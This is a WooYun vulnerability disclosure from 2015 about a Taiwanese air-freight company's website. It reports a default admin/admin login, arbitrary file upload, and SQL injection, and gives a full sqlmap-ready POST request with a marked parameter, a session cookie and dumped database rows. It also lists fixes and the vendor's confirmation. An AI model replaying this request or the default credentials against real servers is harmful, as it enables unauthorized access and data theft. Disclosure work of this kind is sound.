当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161926

漏洞标题:華通航空貨運承攬有限公司多個漏洞打包(弱口令,任意文件上傳,SQL注入)(臺灣地區)

相关厂商:華通航空貨運承攬有限公司

漏洞作者: Xmyth_夏洛克

提交时间:2015-12-16 20:56

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

RT

详细说明:

URL:http://**.**.**.**/

网站.png


1,後台弱口令
admin/admin

后台.png


可添加管理員

添加管理员.png


漏洞证明:

2,任意文件上傳

上传.png


3,SQL注入

注.png


單引號報錯

报错.jpg


放入sqlmap

POST /admin/pages/CustUserEdit.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/admin/pages/CustUserEdit.aspx
Cookie: ASP.NET_SessionId=nxmevlikprgfn2vojukplyzn; .ASPXAUTH=2388C51300DD5828E590406391CC939796C83D76D680EE3323A40DAB86CB9E243851B8E194F1DFC133F987B3E91FCB7F99AD1A6A183E43A46C0BCD20A244303454AF99C5688D181E7572F168784694ACBE83A174C34BBE3EA79AD463CA26128BC87E28D0831275ED92BB3A8B4377D2F491CED0E2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5517
ctl00_ContentPlaceHolder1_ATabUser_ClientState=%7B%22ActiveTabIndex%22%3A0%2C%22TabState%22%3A%5Btrue%5D%7D&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=FDauhF5RobLIGAHWCJzZKTE9wBG0kk%2FGqRfFLbYqkgPEqTYpsMAfELvyBD93JF2MEOq9Pdm3jZp7fv3ps6N5VjsUUWaxsQ01%2BJvfMKHfL6sS1UV45Uoy%2B8hidtmMhGt4dcg3vmSdTd%2BG2ygbNonh6bkaybW4N9lSKXDtNs6p0klk4WqvGoOH8rm%2FomydcxcAZ56%2FbjvuChALunNFn1sVJYJ4SOBpLE0RB4cD70M2kOgozaSOn%2BhyUI8T0FRaSGv%2Bt8vT31ScWdYvTRKf01W3%2FbiC8uHPo439F3iq85PvZy39dUnk0%2Be93117crXvgZM6TvxfOlmVMRPAel8ib5dN7TwC4t1gwP0zpLxbNAzydPzqls4Iz%2Fpu7kagWQvuJqQKA6bnENHEdiPM9Zf0zqShxc6wyjG15MR4HoJn5jLpqsyPNO44y7NYgnsKOiEheTPcnaUHdvLgH1fdvdtHwuhhUhYBdpJ35nR3GS50oJRrwTTcW95IWonVbUBIhOKgNWFbQkIMtyJvlEHMCvheQ39NacHuHLy7J%2BojNJeXTqYQKL2cAGaTGKu0e95WE1UplbXNqRxq1JKRJoKyO7D2ZEQxU5sCIO0jU%2BgJZy17%2FdXk7eiI%2F156MHZGsJBnRiAmqVi6U7yIkuV89TpOdgkq9bVV%2BFaeP0s%2BU4JMGsvvma5TExuA5ARqN79AcpC1CZU%2FYodgJE5OCOs5ejWJeTXcZ1wJgjo682O5XKa0wDRLV3PAFOAfagE9tt3cA8%2BjNAtncoCRUMUtkvrOfxLqJUkkvjfuDMg%2BAV5XYdV5cPUMfpZmFPszPWuWXOeDEPl%2FsbJnJ0IUoaTZtcu6%2Bhca%2B7J1wM%2Bn5tURz7foAqnCjUmAZnpDH1II22upgXwUxbP%2BTypi11HeRaf0zPaEp4BaHLumzqXjQi%2FZo81JpMgo59Pb3xhwHHVzT0JvL8PALYJ%2BHYvUfNJs3cEZgjESuI8RtqmGTguOMuewuUn%2FbhuXZ7yWnFBx7MdnAl6Llmg6E3xT32NlQL3sM4isC2UBNJw2MFDbgmGkB6G7BkHQu82YnPxVc81c1PLxqIb8AavCaFE54iNKQScsnZzcDW%2ByKC8MKj0XbOaYE9TOFRptJFCiO1jkRbr3c0xDmd1vk82OP7jvxl3d%2B7yZVCXwZBfcsCgWfHRWMswUbc1TxyenHdf2X0HXzN%2BWEYmh%2FBd93anP%2Bz%2FAx3EZIdArw3z0AFIJIY4GWBwKK0kkSKo8DzUiMhbOjJaNbRaBS%2BGDj0jkDX6xc%2Fm9v2rj4kuzhTkUdb%2FF5I9Ywe%2BxrFxn1NFCnnU0zeBJ2R%2BIkKmMaC9f%2FfCqFGXtfgCQOIXLJwar36xbpnW%2FlTSD813EnNxirSkw%2Fvnk8hmc%2FCemskbinl4ap%2BZ7RjOWpItEdbtHbIMC97iR9e7BLdMX1kV5%2FW99FwCi7jWViFtW%2FkSGKz7q06QbgXzXNyBuQ9k89GB72RxwIoVmlk2WCIJXg51Cw49GFIItcrdxF%2B%2FBWtAVQSbNBvre2Vg4Q8A65%2Fc3G5y8Hw74zn6gIoYTYESv3H5%2F11Mst84L9PU3cA%2F9dQoIKNabzOiKzWUs0kLC6DQFIzsuRRCLBZ1lL6CTL6dx7OeITYc7lyG1et1hOqQzRkVmmW4Yk%2BLmeeRtOv2%2FsInzzYteSHjUWL93YQ70TM%2BeNPj%2B%2FQ10vAlezmMmBPktZ2CS1CZQji7OB4hUTG5fO1soxiNwo%2Bs7EqXyznObc%2BDEXXlwpaXpgrJhMuWg4QLXma4C8cEHnCexIqQ0tfqtAjushx%2F9isyuznZRIxokiEannPt8CvdT8IrdKq%2Bno3XnBwSj5NGkxjSMi8IiD7lQGSQpPZ4W9sUEJoZw%2BUCUfzNCW6ZpWLVj4e%2BsosjF3xM3B2Mhxiu6n2d0bwH4SSVxLu8Czo5JaqdkXWW4arSJCj9V5XZxL2JVRARqyI8lJUaMB7Zog1NeNOtx32vzxWZUPZ56ChSeliaUO%2FMvFSKYt%2FhlRl6FncXeOwLEMTe9fAL5MUIm0nJeA06xcWdoUcdGkFrOJtCLWBZn2DwYzO73QiWXWcjl%2BFM5MgHkOcYkKIAm3dDEe1qm5Jm18rMLJr%2Bmc6MQPm3UUgDGvRi1TqAm8YoKccgtyXJDxYt7Tnjp7yT5NeuEhAsZ2GQ3Y9y%2BaOsSEbiCeC%2FN8qA%2FYVRgimWk1kEsBE6jGETaBByRjB%2FuUKBUNS63fHPIw4OxGGt65NR8Y8w2%2BCmM0YUxP1AfyvBxGG2%2F5KPLQAnr63NDxjOtayudDQrkKYAY5Z4%2FKMj6KtXhkxilREpOgHU00NmIyNVOYDKRwEyOAI5fa%2F7MEekSqlRIOxFiNHXJ1Sd%2BfAEbGqVXqToc%2BNZC3urQgNcpJFkMmXQ3WoRfjLF%2BFoL8GRnFIOZTUN6os8504K4R8MFW95IYwiZiPMDD3TUm1JwO24pv0DqXzeD2lQRf5LU1uHyYxdBFYWUFz6s4laBnv9BPCFo5pcRpQZHUn4sMD%2BWvFOLGTvH7ZsFmxhzhbtGyVgw%2F96%2BBykZelbw6kJ5Pfu5MzgJVbtzgkHMnRJgoz3scJlcz5Cng9DwBRGxxBOEqPx6pHH0gtOTRo8XMh5%2FZO28LiVG%2Bm4Zwy4TjmQlmS%2FRuj0uC3%2FPR%2B3egkebYCnmFQOl6WTQFKBUvJbFFfsigOPcGRerOrpxbToZDjhyO2l%2BvdLlalhv%2F%2FXRorehYCC1hs1LgYvaUnBl1qofRlDggbaUVpw8hZ7B7cKCgOFn%2BwkjJJmljQp3NJbXCPYct1nDd%2FGdE56q9w0RKsInGQdlX1VCOqURyxtgSykoGoGDGU3WxPvUza0G4f0U0MPZpyS1NDaYYTh0kLQp6fNpjQza3H9hsNoOP4zMLZDYnVfVxhaZflYSsafUcT98Vt2652o7oY%2B%2BFoy0LxkHjXsfmA6Bb3VYUVhVeRNTUutRTyqQsOISiLHMYQi%2FMcm220FUUyyEFDb4%2FxgMo814EOVUBuRoYy57W2bUEsoisOhUbWKR16frAnPdGhHw5Q5enJjSezKikjBTREYTCO6oi2GRJdhgjojnAmLhD3zE9Ab5NcZaP%2B%2BtH07yIa1QC5SI0u5mQlI91jW9BR3t65epBIt6u96zpCpP7Vpz8qRhQNf2rhWqHgsNJ1Dlb89%2Bzq2iscnqOVyuIxp2oyvtnSk2PTBq9MlIVkw13c5MHBtxwrFgOdXtbNiKyUdYgZPI7fSHHSnwqrSKSJ%2FF3M9aO3fKAg6y464uRvDvjHCDYeJfk3qRl3y4RfqivvpTsNMoF27gU%2F3cofpg6LVTYj9C2RWoVIdSfUt%2BtMkTDjs7Dj%2FfgZQpWfllymVSV6gTPF%2FGFvdc%2FsEtJMk0eydQBEeY3HBQxefiQZdprldnEiEXWlkMr%2FE2vE3l1EN%2BuIHqzHWD209WRg7nM0DUUkNoVl7sAFovWx7qlBMor47bdpc%2B21Gzpxzt7H2%2FC8EBglG08vjd69Vy%2BHUj0outkDFFxrbmPk34KVvlPNQiiz7uuRbR7rgi5w%2FIE%2Fcs1iLCgShDERuXm03QxaUsDiYlU2YeH5S6TNBs%2BpHXL%2BCEG1xzMyJL6CVQ4lr%2BwaaGTc%2BEAFvDi9OsYvBD%2BeGyA5LIQuyWMIHMfHA7aBIx95aNZyg3BePGMcOWcQEgTuQwyhhYAFBnGf96PJNsdbr05QNij944x48P7OXqo%2FW9bLvCfNqmB6CO722amtzi0Di2iqPaTk1uVXiSvIbYDyNUiXMbGU63gf%2B9Vs93WPuicNVE%2F%2FWBPtEYm1YXyOK7NJGlay7ioSZmgaVzl7WXPobIqXQRCkLf%2F4aL7KEW5aGhqkaKsMZFBRCTfZCQNb%2FiDVU6yp0UuqIwJt4WQiafVzcWM7ZGFyLQwXozNJLn%2FckvVFfXUx8kGYwd%2BnfcTPQNIpY%2BjSR9juZyOQnNz5wJIcsxk97WUlK%2B2N26wO%2FgJ7OJfMMq0dQ6TmrLYt1lpiIVTEwa3XU5GIsYJKqKkjBaQfq2ebLPgdVhwh2PtpPUQCKbCmdkxgnOEOZXHojT7hAuUQo5ej77%2Bfw%2BwjOx8dWsvpGqmKGBhAEheYqAdDrgMzN6KD7qeMYd4RToEN%2BSP%2BA%2Fd1rvh5S%2FU6J9mHkMniQ50hccFVj76G2kuhhiPECWPeTjEQGD08Dq2zeU%2Boo2Ml8rmUmzoxDgzWZwSQ1SbMoYiklW%2F1L%2FxPrXLwA%2FP6d0gSm2AgQVaAVNN3RgVImDTQy1oSUEed3GR8uklwFk1OME7uqLMpfC5h83rKhMTFqx6pGEhMmNVIMOdZBSRUptqTge%2FIMadFCrBSiBSFJuQrUCKdTmNsh5%2FNptW%2FYy3uGe7wPb%2BDDPTUeuLap7FOsLYDSRKoiMel%2F7RUYw5hBT%2FASFaoTxjsduhoQjXyH5Uc7wSQxGdPoF0gqRYV%2F3wU6DYoEviPx%2B4%2F4Vc0qBTqMandkQBMiml%2F4FkW%2F5%2BjJQEqdy0WH8pnie1O%2BbnImagu%2BAfD8xwGcnmE%2BjnQWJt2tPsQBliPxwUfJ2kLqWlViOPWL%2B1aHJEzOnwAy9HhDR5xzWIZnBvku7rgIxh0ekVJ8ERF6ztqwH0Uxk%2BNNA%3D&__VIEWSTATEGENERATOR=64BA23AA&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=W50dU%2FgLwh%2BJ7VYqpL7GvjRruJpjiIVhGeYC7nhX%2Bj0Y6aHIIPwuvCnFE03s4SzAMA6FpK4S3MPOCnTAKE4uCfhJ4uwwgXLKqpRveQwPPwF2rkQ2UaHcWM5oHaop6BKosYilYzoRbECEFiqkbZ3Z3NJCbGE%3D&ctl00%24ContentPlaceHolder1%24ATabUser%24TabPanel1%24ctl01%24tbUserId=123*&ctl00%24ContentPlaceHolder1%24ATabUser%24TabPanel1%24ctl01%24tbName=&ctl00%24ContentPlaceHolder1%24ATabUser%24TabPanel1%24ctl01%24btnSearch=%E6%90%9C%E5%B0%8B&ctl00%24httpurl=


ctl00%24ContentPlaceHolder1%24ATabUser%24TabPanel1%24ctl01%24tbUserId參數過濾不嚴

注入点.png


DBA權限

dba.png


涉及八個庫

8库.jpg


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: Northwind
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.Orders | 830 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.Products | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
| dbo.[Products Above Average Price] | 25 |
| dbo.[Category Sales for 1997] | 8 |
+--------------------------------------+---------+
Database: Northwind
Table: Orders
[15 entries]
+---------+------------+------------+---------+---------+-------------------+----------------------------+--------------------+-------------+--------------------+-------------+--------------------------------------------+--------------------+----------------+
| OrderID | EmployeeID | CustomerID | ShipVia | Freight | ShipCity | ShipName | OrderDate | ShipRegion | ShippedDate | ShipCountry | ShipAddress | RequiredDate | ShipPostalCode |
+---------+------------+------------+---------+---------+-------------------+----------------------------+--------------------+-------------+--------------------+-------------+--------------------------------------------+--------------------+----------------+
| 10248 | 5 | VINET | 3 | 32.38 | Reims | Vins et alcools Chevalier | 07 4 1996 12:00AM | NULL | 07 16 1996 12:00AM | France | 59 rue de l'Abbaye | 08 1 1996 12:00AM | 51100 |
| 10249 | 6 | TOMSP | 1 | 11.61 | M\\?fcnster | Toms Spezialit\\?e4ten | 07 5 1996 12:00AM | NULL | 07 10 1996 12:00AM | Germany | Luisenstr. 48 | 08 16 1996 12:00AM | 44087 |
| 10250 | 4 | HANAR | 2 | 65.83 | Rio de Janeiro | Hanari Carnes | 07 8 1996 12:00AM | RJ | 07 12 1996 12:00AM | Brazil | Rua do Pa\\?e7o, 67 | 08 5 1996 12:00AM | 05454-876 |
| 10251 | 3 | VICTE | 1 | 41.34 | Lyon | Victuailles en stock | 07 8 1996 12:00AM | NULL | 07 15 1996 12:00AM | France | 2, rue du Commerce | 08 5 1996 12:00AM | 69004 |
| 10252 | 4 | SUPRD | 2 | 51.30 | Charleroi | Supr\\?eames d\\?e9lices | 07 9 1996 12:00AM | NULL | 07 11 1996 12:00AM | Belgium | Boulevard Tirou, 255 | 08 6 1996 12:00AM | B-6000 |
| 10253 | 3 | HANAR | 2 | 58.17 | Rio de Janeiro | Hanari Carnes | 07 10 1996 12:00AM | RJ | 07 16 1996 12:00AM | Brazil | Rua do Pa\\?e7o, 67 | 07 24 1996 12:00AM | 05454-876 |
| 10254 | 5 | CHOPS | 2 | 22.98 | Bern | Chop-suey Chinese | 07 11 1996 12:00AM | NULL | 07 23 1996 12:00AM | Switzerland | Hauptstr. 31 | 08 8 1996 12:00AM | 3012 |
| 10255 | 9 | RICSU | 3 | 148.33 | Gen\\?e8ve | Richter Supermarkt | 07 12 1996 12:00AM | NULL | 07 15 1996 12:00AM | Switzerland | Starenweg 5 | 08 9 1996 12:00AM | 1204 |
| 10256 | 3 | WELLI | 2 | 13.97 | Resende | Wellington Importadora | 07 15 1996 12:00AM | SP | 07 17 1996 12:00AM | Brazil | Rua do Mercado, 12 | 08 12 1996 12:00AM | 08737-363 |
| 10257 | 4 | HILAA | 3 | 81.91 | San Crist\\?f3bal | HILARION-Abastos | 07 16 1996 12:00AM | T\\?e1chira | 07 22 1996 12:00AM | Venezuela | Carrera 22 con Ave. Carlos Soublette #8-35 | 08 13 1996 12:00AM | 5022 |
| 10258 | 1 | ERNSH | 1 | 140.51 | Graz | Ernst Handel | 07 17 1996 12:00AM | NULL | 07 23 1996 12:00AM | Austria | Kirchgasse 6 | 08 14 1996 12:00AM | 8010 |
| 10259 | 4 | CENTC | 3 | 3.25 | M\\?e9xico D.F. | Centro comercial Moctezuma | 07 18 1996 12:00AM | NULL | 07 25 1996 12:00AM | Mexico | Sierras de Granada 9993 | 08 15 1996 12:00AM | 05022 |
| 10260 | 4 | OTTIK | 1 | 55.09 | K\\?f6ln | Ottilies K\\?e4seladen | 07 19 1996 12:00AM | NULL | 07 29 1996 12:00AM | Germany | Mehrheimerstr. 369 | 08 16 1996 12:00AM | 50739 |
| 10261 | 4 | QUEDE | 2 | 3.05 | Rio de Janeiro | Que Del\\?edcia | 07 19 1996 12:00AM | RJ | 07 30 1996 12:00AM | Brazil | Rua da Panificadora, 12 | 08 16 1996 12:00AM | 02389-673 |
| 10262 | 8 | RATTC | 3 | 48.29 | Albuquerque | Rattlesnake Canyon Grocery | 07 22 1996 12:00AM | NM | 07 25 1996 12:00AM | USA | 2817 Milton Dr. | 08 19 1996 12:00AM | 87110 |
+---------+------------+------------+---------+---------+-------------------+----------------------------+--------------------+-------------+--------------------+-------------+--------------------------------------------+--------------------+----------------+

修复方案:

1,密碼增強
2,上傳限制
3,過濾參數

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-18 19:59

厂商回复:

感謝通知

最新状态:

暂无


漏洞评价:

评价